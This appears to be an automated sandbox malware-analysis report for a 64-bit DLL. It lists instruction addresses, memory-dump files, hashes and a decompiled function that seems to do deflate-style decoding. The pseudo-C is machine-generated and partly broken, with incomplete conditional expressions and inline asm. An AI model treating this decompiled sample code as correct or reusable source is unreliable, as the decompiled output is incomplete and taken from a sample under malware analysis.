0x7fef306084e
0x7fef3060856
0x7fef306085c
0x7fef306085e
0x7fef3060862
0x7fef3060866
0x7fef306086a
0x7fef306086c
0x7fef3060877
0x7fef306087d
0x7fef3060892
0x7fef306089e
0x7fef30608a3
0x7fef30608aa
0x7fef30608b4
0x7fef30608bf
0x7fef30608c8
0x7fef30608d4
0x7fef30608e2
0x7fef30608fc
0x7fef306090e
0x7fef3060932
0x7fef306093d
0x7fef3060948
0x7fef3060953
0x7fef306095c
0x7fef3060960
0x7fef3060968
0x7fef306096e
0x7fef306097b
0x7fef3060988
0x7fef306098d
0x7fef306099a
0x7fef30609aa
0x7fef30609b1
0x7fef30609b9
0x7fef30609be
0x7fef30609ca
0x7fef30609f3
0x7fef30609f6
0x7fef30609fd
0x7fef3060a01
0x7fef3060a09
0x7fef3060a13
0x7fef3060a19
0x7fef3060a20
0x7fef3060a30
0x7fef3060a35
0x7fef3060a3a
0x7fef3060a3d
0x7fef3060a48
0x7fef3060a83
0x7fef3060a89
0x7fef3060a8e
0x7fef3060a95
0x7fef3060a9a
0x7fef3060aa2
0x7fef3060aa7
0x7fef3060aac
0x7fef3060aaf
0x7fef3060abc
0x7fef3060ac1
0x7fef3060ac7
0x7fef3060ad0
0x7fef3060ad5
0x7fef3060ade
0x7fef3060ae6
0x7fef3060aea
0x7fef3060af6
0x7fef3060afe
0x7fef3060b0b
0x7fef3060b14
0x7fef3060b18
0x7fef3060b21
0x7fef3060b27
0x7fef3060b34
0x7fef3060b39
0x7fef3060b3e
0x7fef3060b47
0x7fef3060b4e
0x7fef3060b52
0x7fef3060b56
0x7fef3060b59
0x7fef3060b63
0x7fef3060b66
0x7fef3060b6b
0x7fef3060b73
0x7fef3060b77
0x7fef3060b7b
0x7fef3060b80
0x7fef3060b85
0x7fef3060b8b
0x7fef3060b8e
0x7fef3060b92
0x7fef3060b97
0x7fef3060b9f
0x7fef3060ba4
0x7fef3060ba8
0x7fef3060bab
0x7fef3060bae
0x7fef3060bb3
0x7fef3060bb5
0x7fef3060bb9
0x7fef3060bbc
0x7fef3060bbf
0x7fef3060bc1
0x7fef3060bc5
0x7fef3060bc8
0x7fef3060bcb
0x7fef3060bd0
0x7fef3060bd3
0x7fef3060bd8
0x7fef3060bdb
0x7fef3060bde
0x7fef3060be3
0x7fef3060be6
0x7fef3060beb
0x7fef3060bee
0x7fef3060bf1
0x7fef3060bf3
0x7fef3060bf7
0x7fef3060bfa
0x7fef3060bfd
0x7fef3060bff
0x7fef3060c03
0x7fef3060c06
0x7fef3060c09
0x7fef3060c0b
0x7fef3060c0e
0x7fef3060c19
0x7fef3060c1b
0x7fef3060c1f
0x7fef3060c22
0x7fef3060c25
0x7fef3060c27
0x7fef3060c2b
0x7fef3060c2e
0x7fef3060c47
0x7fef3060c49
0x7fef3060c52
0x7fef3060c68
0x7fef3060c73
0x7fef3060c76
0x7fef3060c7f
0x7fef3060c83
0x7fef3060c90
0x7fef3060c98
0x7fef3060c9a
0x7fef3060ca5
0x7fef3060cae
0x7fef3060cb1
0x7fef3060cb6
0x7fef3060cb9
0x7fef3060cbb
0x7fef3060cc0
0x7fef3060cc7
0x7fef3060cdd
0x7fef3060ce5
0x7fef3060ced
0x7fef3060cf5
0x7fef3060cf9
0x7fef3060cfc
0x7fef3060cff
0x7fef3060d0a
0x7fef3060d10
0x7fef3060d13
0x7fef3060d1c
0x7fef3060d1f
0x7fef3060d25
0x7fef3060d2d
0x7fef3060d3d
0x7fef3060d43
0x7fef3060d47
0x7fef3060d4a
0x7fef3060d52
0x7fef3060d55
0x7fef3060d5d
0x7fef3060d68
0x7fef3060d80
0x7fef3060d88
0x7fef3060d9d
0x7fef3060da0
0x7fef3060da5
0x7fef3060dae
0x7fef3060db6
0x7fef3060dbe
0x7fef3060dc2
0x7fef3060dca
0x7fef3060dd3
0x7fef3060de7
0x7fef3060dfe
0x7fef3060e05
0x7fef3060e0c
0x7fef3060e13
0x7fef3060e1a
0x7fef3060e25
0x7fef3060e2d
0x7fef3060e38
0x7fef3060e3a
0x7fef3060e42
0x7fef3060e53
0x7fef3060e5a
0x7fef3060e61
0x7fef3060e65
0x7fef3060e6b
0x7fef3060e6f
0x7fef3060e8f
0x7fef3060e91
0x7fef3060e98
0x7fef3060e98
0x7fef3060e9c
0x7fef3060ea3
0x7fef3060ec1
0x7fef3060ec8
0x7fef3060ed3
0x7fef3060ee9
0x7fef3060ef5
0x7fef3060ef8
0x7fef3060efe
0x7fef3060f06
0x7fef3060f1e
0x7fef3060f23
0x7fef3060f2b
0x7fef3060f33
0x7fef3060f38
0x7fef3060f3e
0x7fef3060f54
0x7fef3060f5b
0x7fef3060f62
0x7fef3060f69
0x7fef3060f79
0x7fef3060f80
0x7fef3060f80
0x7fef3060f84
0x7fef3060f8b
0x7fef3060f8d
0x7fef3060f95
0x7fef3060f9f
0x7fef3060fa6
0x7fef3060fad
0x7fef3060fad
0x7fef3060fb1
0x7fef3060fb4
0x7fef3060fb8
0x7fef3060fc2
0x7fef3060fe9
0x7fef3060ff1
0x7fef3060ff8
0x7fef3060ff8
0x7fef3060ffc
0x7fef3061003
0x7fef306100c
0x7fef3061033
0x7fef306103a
0x7fef306103a
0x7fef306103e
0x7fef3061045
0x7fef3061051
0x7fef3061059
0x7fef3061060
0x7fef306107e
0x7fef3061097
0x7fef30610a8
0x7fef30610bb
0x7fef30610c2
0x7fef30610c4
0x7fef30610d6
0x7fef30610eb
0x7fef30610f2
0x7fef30610f7
0x7fef30610ff
0x7fef3061101
0x7fef3061109
0x7fef306112c
0x7fef3061137
0x7fef3061139
0x7fef306113d
0x7fef3061140
0x7fef3061142
0x7fef3061156
0x7fef306115c
0x7fef3061160
0x7fef3061163
0x7fef3061167
0x7fef3061177
0x7fef3061188
0x7fef306118c
0x7fef306118f
0x7fef30611a6

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77e7f5b4109ed7afa0cc67588ad9fd97b46730d6f1d77cfc1071bd0708352389
Instruction ID: 6f5bf6d4d61cb7b092c36c5c0e402cbc23d9bba1456f725c46f951d27b7a499a
Opcode Fuzzy Hash: 77e7f5b4109ed7afa0cc67588ad9fd97b46730d6f1d77cfc1071bd0708352389
Instruction Fuzzy Hash: 75D1E572B0C3C58BE7A48F19E4407AAB7E6F788754F148236DA9957BD8D63DD440EB00

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF305FA4D Relevance: .3, Instructions: 319
COMMONCrypto

Download Yara Rule

C-Code - Quality: 55%

			E000007FE7FEF305FA4D(char __ebx, signed int __ecx, signed int __esi, void* __rcx, signed int __rdx, void* __r8, signed int __r9, void* __r10, void* __r11, void* __r12, signed long long __r13, void* __r14, signed int __r15) {
				signed int _t502;
				signed int _t504;
				signed int _t507;
				signed int _t512;
				signed int _t516;
				signed char _t517;
				signed char _t518;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed char _t523;
				signed char _t530;
				signed int _t538;
				signed int _t541;
				signed int _t544;
				unsigned int _t549;
				signed int _t550;
				short _t552;
				signed int _t566;
				signed short _t568;
				signed int _t569;
				signed int _t571;
				signed int _t579;
				signed short _t581;
				signed char _t590;
				signed int _t596;
				signed int _t599;
				unsigned int _t603;
				signed int _t632;
				signed char _t634;
				signed int _t638;
				signed char _t639;
				signed int _t648;
				signed char _t658;
				char _t660;
				signed char _t663;
				signed char _t667;
				signed char _t668;
				signed char _t671;
				unsigned int _t690;
				signed int _t691;
				short _t693;
				signed char _t708;
				signed char _t710;
				signed int _t714;
				signed int _t715;
				signed char _t717;
				signed char _t723;
				signed int _t727;
				signed char _t731;
				signed int _t734;
				signed char _t753;
				unsigned int _t760;
				signed char _t762;
				signed int _t772;
				signed int _t784;
				signed int _t797;
				signed int _t798;
				signed int _t804;
				signed int _t810;
				signed short _t812;
				signed int _t814;
				signed short _t817;
				signed int _t822;
				signed int _t823;
				signed short _t826;
				void* _t830;
				signed int _t833;
				signed int _t839;
				signed int _t846;
				signed int _t849;
				signed int _t852;
				signed char _t854;
				signed int _t861;
				signed int _t877;
				signed int _t879;
				signed int _t903;
				signed int _t906;
				void* _t918;
				void* _t921;
				void* _t924;
				void* _t935;
				signed short _t946;
				void* _t951;
				void* _t954;
				void* _t977;
				signed int _t987;
				void* _t989;
				void* _t1018;
				short _t1026;
				void* _t1031;
				signed int _t1059;
				signed int _t1060;
				void* _t1064;
				void* _t1067;
				void* _t1069;
				signed int _t1077;
				intOrPtr _t1080;
				void* _t1085;
				signed long long _t1088;
				signed long long _t1092;
				signed long long _t1093;
				signed long long _t1099;
				signed long long _t1100;
				long long _t1116;
				signed int _t1125;
				signed long long _t1126;
				signed long long _t1127;
				signed long long _t1131;
				signed long long _t1132;
				signed long long _t1133;
				signed long long _t1134;
				signed long long _t1135;
				signed long long _t1136;
				signed long long _t1137;
				signed long long _t1139;
				void* _t1140;
				long long* _t1147;
				unsigned long long _t1149;
				signed long long _t1151;
				unsigned long long _t1154;
				unsigned long long _t1158;
				void* _t1162;
				long long _t1163;
				signed long long _t1165;
				signed long long _t1169;
				signed long long _t1170;
				signed long long _t1183;
				signed long long _t1187;
				intOrPtr _t1195;
				void* _t1197;
				long long _t1200;
				signed long long _t1201;
				intOrPtr _t1202;
				signed long long _t1204;
				signed long long _t1209;
				signed char* _t1217;
				signed long long _t1220;
				unsigned long long _t1224;
				signed long long _t1228;
				unsigned long long _t1229;
				signed long long _t1237;
				unsigned long long _t1240;
				unsigned long long _t1241;
				intOrPtr _t1250;
				signed long long _t1255;
				unsigned long long _t1257;
				signed long long _t1264;
				signed long long _t1265;
				signed long long _t1269;
				signed long long _t1273;
				signed long long _t1277;
				intOrPtr _t1278;
				void* _t1280;
				signed long long _t1289;
				void* _t1294;
				signed long long _t1297;
				long long _t1298;
				void* _t1299;
				signed long long _t1302;
				signed char* _t1307;
				signed char* _t1314;
				signed char* _t1319;
				signed long long _t1322;
				signed long long _t1323;
				signed long long _t1324;
				signed long long _t1326;
				void* _t1331;
				signed long long _t1342;
				void* _t1344;
				signed long long _t1349;
				signed long long _t1350;
				void* _t1351;
				void* _t1352;
				long long _t1353;
				void* _t1357;
				signed long long _t1360;
				void* _t1362;
				intOrPtr _t1369;
				intOrPtr _t1372;
				long long _t1375;
				signed char* _t1378;
				intOrPtr _t1381;
				intOrPtr _t1382;
				intOrPtr _t1383;
				intOrPtr _t1384;
				intOrPtr _t1385;
				intOrPtr _t1387;
				signed long long _t1388;
				intOrPtr _t1392;
				long long _t1395;
				signed char* _t1398;
				signed long long _t1406;
				signed char* _t1409;
				intOrPtr* _t1413;
				signed char* _t1417;
				signed char* _t1418;
				signed char* _t1419;
				signed char* _t1420;
				signed char* _t1421;
				void* _t1425;
				void* _t1428;
				void* _t1429;
				void* _t1433;
				void* _t1434;
				signed int* _t1435;
				signed long long _t1441;

				r12d = __ecx & 0x0000ffff;
				r12d = r12d | 0x00001900;
				if (r12b == 0) goto 0xf305f8f6;
				if ((r12b & 0xffffffff) == 1) goto 0xf30606d0;
				_t502 =  *(_t1344 + 0x38);
				 *(_t1344 + 0x30) =  *(_t1344 + 0x30) >> (_t502 & 0x00000007);
				 *(_t1344 + 0x38) = _t502 & 0xfffffff8;
				 *(_t1344 + 0x40) = 0;
				r12b = 5;
				_t504 =  *(_t1344 + 0x40);
				_t804 =  *(_t1344 + 0x50);
				if (_t504 - 4 >= 0) goto 0xf3060587;
				_t658 =  *(_t1344 + 0x38);
				if (_t658 == 0) goto 0xf305faf2;
				if (_t658 - 8 >= 0) goto 0xf305fb09;
				if (__r14 == __r15) goto 0xf305fae4;
				_t1209 = __rdx << _t658;
				_t1149 =  *(_t1344 + 0x30) | _t1209;
				 *(_t1344 + 0x30) = _t1149;
				 *(_t1344 + 0x38) = _t658 + 8;
				r12d = 0;
				_t1413 = __r14 + 1;
				goto 0xf305faea;
				r12d = _t804;
				if ((r12b & 0x00000002) == 0) goto 0xf305fab9;
				goto 0xf305fb37;
				if (_t1413 == __r15) goto 0xf305fb31;
				_t660 =  *_t1413;
				 *((char*)(__r10 + _t1209 + 0x291d)) = _t660;
				goto 0xf305fb26;
				 *(_t1344 + 0x30) = _t1149 >> 8;
				 *(_t1344 + 0x38) = _t660 + 0xfffffff8;
				 *((char*)(__r10 + __rcx + 0x291d)) = __ebx;
				 *(_t1344 + 0x40) = _t504 + 1;
				r12d = 0;
				goto 0xf305fb37;
				r12d = _t804;
				if (r12b == 0) goto 0xf305faa0;
				if ((r12b & 0xffffffff) == 1) goto 0xf30606d0;
				r12b = 0x14;
				if ( *(_t1344 + 0x40) == 0) goto 0xf305f43b;
				r12b = 7;
				_t918 = __r8 -  *((intOrPtr*)(_t1344 + 0x1a8));
				if (_t918 != 0) goto 0xf305f43b;
				_t1294 = __r15 - __r15;
				if (_t918 == 0) goto 0xf30611fa;
				_t1080 =  *((intOrPtr*)(_t1344 + 0x1a8));
				_t1276 =  >=  ? _t1294 : _t1080 - __r8;
				_t1277 =  >=  ? __r15 :  >=  ? _t1294 : _t1080 - __r8;
				_t921 = _t1277 - _t1294;
				if (_t921 > 0) goto 0xf3061395;
				_t1151 = _t1277 + __r8;
				if (_t921 < 0) goto 0xf30613a4;
				if (_t1151 - _t1080 > 0) goto 0xf30613b3;
				E000007FE7FEF30F1E10();
				_t1417 =  <=  ? __r15 : __r15 + _t1277;
				_t861 =  *(_t1344 + 0x40) - _t804;
				 *(_t1344 + 0x40) = _t861;
				r12b = 6;
				_t1349 = _t1151;
				_t1381 =  *((intOrPtr*)(_t1344 + 0x58));
				 *(_t1344 + 0x70) = _t1349;
				_t663 =  *(_t1344 + 0x38);
				r8d =  *(_t1344 + 0x40);
				_t924 = r8d - 3;
				if (_t924 >= 0) goto 0xf30605ce;
				 *(_t1344 + 0x80) = 0x5;
				 *(_t1344 + 0x88) = 4;
				r9d = r8d;
				_t507 =  *(_t1344 + 0x80 + __r9 * 4);
				_t1314 = _t1417;
				if (_t924 >= 0) goto 0xf305fc89;
				if (_t1314 == __r15) goto 0xf305fc7b;
				_t634 =  *_t1314 & 0x000000ff;
				_t1154 =  *(_t1344 + 0x30) << _t663 |  *(_t1344 + 0x30);
				 *(_t1344 + 0x30) = _t1154;
				 *(_t1344 + 0x38) = _t663 + 8;
				r12d = 0;
				_t1418 =  &(_t1314[1]);
				goto 0xf305fc81;
				r12d =  *(_t1344 + 0x50);
				if ((r12b & 0x00000002) == 0) goto 0xf305fc4c;
				goto 0xf305fcc8;
				 *(_t1344 + 0x30) = _t1154 >> _t507;
				 *(_t1344 + 0x38) = _t663 - _t507;
				 *((intOrPtr*)(_t1381 + 0x30 + __r9 * 4)) = ( *(0xf311f0f8 + __r9 * 2) & 0x0000ffff) + (__esi &  !_t861);
				r8d = r8d + 1;
				 *(_t1344 + 0x40) = r8d;
				r12d = 0;
				if (r12b == 0) goto 0xf305fc10;
				r12d = r12d >> 8;
				if ((r12b & 0xffffffff) == 1) goto 0xf30605fb;
				if ( *(_t1344 + 0x40) -  *(_t1381 + 0x38) >= 0) goto 0xf305fd3a;
				_t667 =  *(_t1344 + 0x38);
				_t1319 = _t1418;
				if (_t667 - 3 >= 0) goto 0xf305fd6b;
				if (_t1319 == __r15) goto 0xf305fd2c;
				_t1158 =  *(_t1344 + 0x30) | __r15 << _t667;
				 *(_t1344 + 0x30) = _t1158;
				_t668 = _t667 + 8;
				 *(_t1344 + 0x38) = _t668;
				r12d = 0;
				_t1419 =  &(_t1319[1]);
				goto 0xf305fd32;
				r12d =  *(_t1344 + 0x50);
				if ((r12b & 0x00000002) == 0) goto 0xf305fd01;
				goto 0xf305fda6;
				 *(_t1381 + 0x38) = 0x13;
				_t1297 = _t1349;
				_t512 = E000007FE7FEF3061920(0xf311f0f8, _t1381, _t1344 + 0x30, _t1349, _t1381);
				_t1350 = _t1297;
				_t1392 =  *((intOrPtr*)(_t1344 + 0x1a0));
				_t1382 =  *((intOrPtr*)(_t1344 + 0x58));
				r12d = _t512;
				goto 0xf305fda6;
				 *(_t1344 + 0x30) = _t1158 >> 3;
				 *(_t1344 + 0x38) = _t668 + 0xfffffffd;
				if (_t512 - 0x13 >= 0) goto 0xf30612c6;
				 *(_t1382 + 0x7fef31212c4) = _t634 & 0x00000007;
				 *(_t1344 + 0x40) = _t512 + 1;
				r12d = 0;
				if (r12b == 0) goto 0xf305fceb;
				_t935 = (r12b & 0xffffffff) - 1;
				if (_t935 == 0) goto 0xf30606d0;
				_t671 =  *(_t1344 + 0x38);
				_t1217 = _t1419;
				if (_t935 >= 0) goto 0xf30604e6;
				if (_t1217 == __r15) goto 0xf305fe03;
				_t1322 = __r15 << _t671;
				 *(_t1344 + 0x30) =  *(_t1344 + 0x30) | _t1322;
				 *(_t1344 + 0x38) = _t671 + 8;
				_t1420 =  &(_t1217[1]);
				goto 0xf305fe08;
				if ((bpl & 0x00000002) == 0) goto 0xf305fdd5;
				_t1220 =  *((intOrPtr*)(_t1344 + 0x1a8));
				_t1183 = __r15 - _t1420;
				if (_t1183 - 4 < 0) goto 0xf306060d;
				_t1085 = _t1220 - _t1350;
				if (_t1085 - 2 < 0) goto 0xf306060d;
				if (_t1085 - 0x103 < 0) goto 0xf305fe4d;
				if (_t1183 - 0xd > 0) goto 0xf3060750;
				_t516 =  *(_t1344 + 0x38);
				if (_t1085 - 0x1e >= 0) goto 0xf305fe76;
				_t1421 =  &(_t1420[4]);
				 *(_t1344 + 0x30) = _t1220 << _t516 |  *(_t1344 + 0x30);
				_t517 = _t516 + 0x20;
				 *(_t1344 + 0x38) = _t517;
				goto 0xf305fe7b;
				_t810 =  *((short*)(_t1382 + 0x3c + _t1183 * 2));
				if (_t810 < 0) goto 0xf305fea3;
				if ((_t810 & 0x0000ffff) - 0x200 < 0) goto 0xf306073e;
				goto 0xf305fecf;
				asm("dec eax");
				asm("adc edi, 0x0");
				if ( !_t810 - 0x23f > 0) goto 0xf30611c7;
				_t812 =  *((short*)(_t1382 + 0x83c + _t1277 * 2));
				_t946 = _t812;
				if (_t946 < 0) goto 0xf305fea8;
				 *(_t1344 + 0x40) = _t812 & 0x0000ffff;
				_t1224 =  *(_t1344 + 0x30) >> 0xb;
				 *(_t1344 + 0x30) = _t1224;
				_t518 = _t517 - 0xb;
				 *(_t1344 + 0x38) = _t518;
				r12b = 0x15;
				asm("bt edi, 0x8");
				if (_t946 < 0) goto 0xf305f43b;
				_t839 =  *((short*)(_t1382 + 0x3c + _t1183 * 2));
				if (_t839 < 0) goto 0xf305ff16;
				if ((_t839 & 0x0000ffff) - 0x200 < 0) goto 0xf306073e;
				goto 0xf305ff42;
				asm("dec eax");
				asm("adc esi, 0x0");
				if ( !_t839 - 0x23f > 0) goto 0xf3061207;
				if ( *((short*)(_t1382 + 0x83c + _t1297 * 2)) < 0) goto 0xf305ff1b;
				 *(_t1344 + 0x30) = _t1224 >> 0xb;
				 *(_t1344 + 0x38) = _t518 - 0xb;
				_t951 = _t1350 -  *((intOrPtr*)(_t1344 + 0x1a8));
				if (_t951 >= 0) goto 0xf3061284;
				 *((intOrPtr*)(_t1392 + _t1350)) = dil;
				asm("bt esi, 0x8");
				if (_t951 < 0) goto 0xf3060a8e;
				if (_t1350 + 1 -  *((intOrPtr*)(_t1344 + 0x1a8)) >= 0) goto 0xf30612a2;
				 *((intOrPtr*)(_t1392 + _t1350 + 1)) = sil;
				_t1351 = _t1350 + 2;
				_t520 =  *(_t1344 + 0x40);
				r12b = 0x15;
				if (_t520 - 0xff > 0) goto 0xf305f43b;
				_t954 = _t1351 -  *((intOrPtr*)(_t1344 + 0x1a8));
				if (_t954 == 0) goto 0xf3061262;
				if (_t954 >= 0) goto 0xf3061284;
				 *(_t1392 + _t1351) = _t520;
				_t1352 = _t1351 + 1;
				r12b = 0xc;
				_t521 =  *(_t1344 + 0x38);
				if (_t521 - 0xe > 0) goto 0xf30600a1;
				_t1187 = __r15 - _t1421;
				if (_t1187 - 1 > 0) goto 0xf3060085;
				_t690 =  *((short*)(_t1382 + 0xddc + _t1187 * 2));
				if (_t690 < 0) goto 0xf3060019;
				if ((_t690 & 0x0000ffff) - 0x200 < 0) goto 0xf3060056;
				_t691 = _t690 >> 9;
				if (_t521 - _t691 < 0) goto 0xf3060056;
				goto 0xf30600a1;
				if (_t521 - 0xb < 0) goto 0xf3060056;
				asm("dec eax");
				asm("adc ecx, 0x0");
				if ( !_t691 - 0x23f > 0) goto 0xf30611b9;
				_t693 =  *((short*)(_t1382 + 0x15dc + _t1187 * 2));
				if (_t693 >= 0) goto 0xf3060051;
				if (_t521 - 0xc >= 0) goto 0xf3060023;
				if (_t693 >= 0) goto 0xf30600a1;
				if (_t1421 == __r15) goto 0xf3060156;
				_t1323 = _t1322 << _t521;
				_t1228 =  *(_t1344 + 0x30) | _t1323;
				 *(_t1344 + 0x30) = _t1228;
				_t522 = _t521 + 8;
				 *(_t1344 + 0x38) = _t522;
				if (_t522 - 0xe <= 0) goto 0xf305ffed;
				goto 0xf30600a1;
				_t1324 = _t1323 << _t522;
				_t1229 = _t1228 | _t1324;
				 *(_t1344 + 0x30) = _t1229;
				_t523 = _t522 + 0x10;
				 *(_t1344 + 0x38) = _t523;
				_t814 =  *((short*)(_t1382 + 0xddc + _t1187 * 2));
				if (_t814 < 0) goto 0xf30600c3;
				goto 0xf30600ef;
				asm("dec eax");
				asm("adc edi, 0x0");
				if ( !(_t814 & 0x000001ff) - 0x23f > 0) goto 0xf30611c7;
				_t817 =  *((short*)(_t1382 + 0x15dc + _t1277 * 2));
				if (_t817 < 0) goto 0xf30600c8;
				if (0xa == 0) goto 0xf30606cb;
				 *(_t1344 + 0x30) = _t1229 >> 0xb;
				 *(_t1344 + 0x38) = _t523 - 0xb;
				if ((_t817 & 0x0000ffff) - 0x1d > 0) goto 0xf306013e;
				 *(_t1344 + 0x44) =  *(_t1277 + 0xf311ef48) & 0x000000ff;
				 *(_t1344 + 0x3c) =  *(0xf311ef68 + _t1277 * 2) & 0x0000ffff;
				_t706 =  ==  ? 0x1601 : 0x1001;
				r12d = 0x2101;
				r12d = r12d & 0x00003700;
				_t973 =  ==  ? 0x1601 : 0x1001;
				if (( ==  ? 0x1601 : 0x1001) == 0) goto 0xf305ffd4;
				goto 0xf3060485;
				r12d =  *(_t1344 + 0x7c);
				goto 0xf3060149;
				_t708 =  *(_t1344 + 0x38);
				_t638 =  *(_t1344 + 0x50);
				if (_t708 - 8 >= 0) goto 0xf3060565;
				if (__r15 == __r15) goto 0xf306019f;
				 *(_t1344 + 0x30) =  *(_t1344 + 0x30) | _t1324 << _t708;
				 *(_t1344 + 0x38) = _t708 + 8;
				_t1425 = __r15 + 1;
				goto 0xf30601a4;
				if ((bpl & 0x00000002) == 0) goto 0xf3060172;
				_t1088 =  *((intOrPtr*)(_t1344 + 0x1a8));
				_t977 = _t1352 - _t1088;
				if (_t977 == 0) goto 0xf3061238;
				if (_t977 >= 0) goto 0xf3061284;
				 *((char*)(_t1392 + _t1352)) =  *(_t1344 + 0x3c);
				_t1353 = _t1352 + 1;
				r12d = 0x11;
				r12d =  ==  ? 6 : r12d;
				 *(_t1344 + 0x40) =  *(_t1344 + 0x40) - 1;
				r12d =  ==  ? 6 : r12d;
				 *(_t1344 + 0x70) = __r13;
				r13d =  *(_t1344 + 0x3c);
				_t1326 =  *((intOrPtr*)(_t1344 + 0x1a8));
				if (_t1353 == _t1326) goto 0xf3060b97;
				_t1162 = _t1326 - _t1353;
				_t1298 = _t1353;
				_t1163 =  >=  ? _t1088 : _t1162;
				 *((long long*)(_t1344 + 0x28)) =  *(_t1344 + 0xb8);
				 *((long long*)(_t1344 + 0x20)) = _t1163;
				_t1375 = _t1298;
				E000007FE7FEF30616A0();
				_t1383 =  *((intOrPtr*)(_t1344 + 0x58));
				_t1357 = _t1298 + _t1163;
				r12b = 0xc;
				 *(_t1344 + 0x40) =  *(_t1344 + 0x40) - _t638;
				if (_t1162 != _t1088) goto 0xf3060208;
				_t1406 =  *(_t1344 + 0x70);
				r12b = 3;
				if ( *((intOrPtr*)(_t1383 + 0x18)) == 0) goto 0xf305f43b;
				_t710 =  *(_t1344 + 0x38);
				_t1278 =  *((intOrPtr*)(_t1344 + 0xe0));
				_t877 =  >=  ? r14d : _t710 >> 3;
				_t639 = _t1326 * 8;
				_t530 = (_t710 & 0xfffffff8) - _t639;
				 *(_t1344 + 0x38) = _t530;
				_t1428 = _t1425 - __r15 + _t1278 - _t1326;
				if (_t1428 - _t1278 > 0) goto 0xf30613c7;
				_t1429 = _t1428 + _t1406;
				 *(_t1344 + 0x30) =  !(0xffffffff << (_t530 & 0x00000038)) &  *(_t1344 + 0x30) >> (_t710 & 0x00000007);
				r12b = 0x18;
				if (( *(_t1344 + 0x1b8) & 0x00000001) == 0) goto 0xf305f43b;
				 *(_t1344 + 0x40) = 0;
				r12b = 0x17;
				_t714 =  *(_t1344 + 0x40) & 0x000001ff;
				 *(_t1344 + 0x40) = _t714;
				r12b = 0x14;
				if (_t714 == 0x100) goto 0xf305f43b;
				r12b = 0x20;
				if (_t714 - 0x11d > 0) goto 0xf305f43b;
				_t715 =  *(_t1088 + 0xf311eee8) & 0x000000ff;
				_t987 = _t715;
				r12b = _t987 == 0;
				 *(_t1344 + 0x44) = _t715;
				 *(_t1344 + 0x40) =  *(0xf311ef08 + _t1088 * 2) & 0x0000ffff;
				r12b = r12b | 0x0000000e;
				r9d =  *(_t1344 + 0x3c);
				if (_t987 >= 0) goto 0xf3060382;
				r12b = 0x1d;
				if ( *((intOrPtr*)(_t1344 + 0xf4)) != 0) goto 0xf305f43b;
				_t1299 = _t1357 + 0xf311ef08;
				_t1237 =  *((intOrPtr*)(_t1344 + 0x1a8));
				_t989 = _t1299 - _t1237;
				if (_t989 > 0) goto 0xf30603b1;
				_t1092 = (_t1357 - _t1375 &  *(_t1344 + 0xb8)) - _t1357;
				if (_t989 < 0) goto 0xf3060a9a;
				if (_t1092 - 0xf311ef08 >= 0) goto 0xf3060a9a;
				r12d = 0x13;
				r12d =  ==  ? 0xc : r12d;
				_t538 =  *(_t1344 + 0x40);
				_t822 =  *(_t1344 + 0x50);
				if (_t538 - 3 > 0) goto 0xf3060605;
				_t717 =  *(_t1344 + 0x38);
				if (_t717 == 0) goto 0xf3060421;
				_t1331 = _t1429;
				if (_t717 - 8 >= 0) goto 0xf3060436;
				if (_t1331 == __r15) goto 0xf3060413;
				_t1165 =  *(_t1344 + 0x30) | _t1237 << _t717;
				 *(_t1344 + 0x30) = _t1165;
				 *(_t1344 + 0x38) = _t717 + 8;
				r12d = 0;
				goto 0xf3060419;
				r12d = _t822;
				if ((r12b & 0x00000002) == 0) goto 0xf30603e8;
				goto 0xf306046a;
				if (_t1331 + 1 == __r15) goto 0xf3060464;
				goto 0xf3060453;
				_t1240 = _t1165 >> 8;
				 *(_t1344 + 0x30) = _t1240;
				 *(_t1344 + 0x38) = ( *(_t1383 + 0x14) << 8) + 0xfffffff8;
				_t784 =  *(_t1383 + 0x14) << 8;
				_t723 = _t639 & 0x000000ff | _t784;
				 *(_t1383 + 0x14) = _t723;
				 *(_t1344 + 0x40) = _t538 + 1;
				r12d = 0;
				goto 0xf306046a;
				r12d = _t822;
				if (r12b == 0) goto 0xf30603cf;
				if ((r12b & 0xffffffff) == 1) goto 0xf30606d0;
				goto 0xf3060c1b;
				_t541 = _t723 & 0x000000ff;
				if (_t541 == 1) goto 0xf30606d0;
				goto 0xf3060c27;
				_t879 =  !_t877 & _t784;
				_t1241 = _t1240 >> _t541;
				 *(_t1344 + 0x30) = _t1241;
				 *(_t1344 + 0x38) = _t639;
				 *(_t1344 + 0x40) =  *(_t1344 + 0x40) + _t879;
				r12b = 0xf;
				goto 0xf305f43b;
				 *(_t1344 + 0x30) = _t1241 >> _t541;
				 *(_t1344 + 0x38) = _t639;
				 *(_t1344 + 0x3c) =  *(_t1344 + 0x3c) + ( !_t879 & _t784);
				r12b = 0x16;
				goto 0xf305f43b;
				 *(_t1344 + 0x30) = _t1165 >> _t541;
				 *(_t1344 + 0x38) = _t822;
				 *(_t1344 + 0x80) = _t1092;
				 *(_t1344 + 0x88) = _t1092;
				 *((long long*)(_t1344 + 0x90)) = 0xb;
				_t727 =  *(_t1344 + 0x3c);
				_t1093 = _t1092 & 0xf311ef08;
				if (3 == 3) goto 0xf30612f1;
				if (_t727 != 0x10) goto 0xf30606d9;
				if (_t1299 - 1 - 0x1c9 >= 0) goto 0xf3061307;
				goto 0xf30606db;
				 *(_t1344 + 0x30) = _t1093 >> 8;
				 *(_t1344 + 0x38) = _t727 + 0xfffffff8;
				 *(_t1344 + 0x3c) = 3;
				r12b = 0x12;
				goto 0xf305f43b;
				_t544 =  *(_t1383 + 0x291d) & 0x0000ffff;
				 *(_t1344 + 0x40) = _t544;
				r12b = 0x1e;
				if (_t544 != 0x2101) goto 0xf305f43b;
				r12b = 0x14;
				if (_t544 == 0) goto 0xf305f43b;
				r12d = 0x11;
				r12d =  ==  ? 6 : r12d;
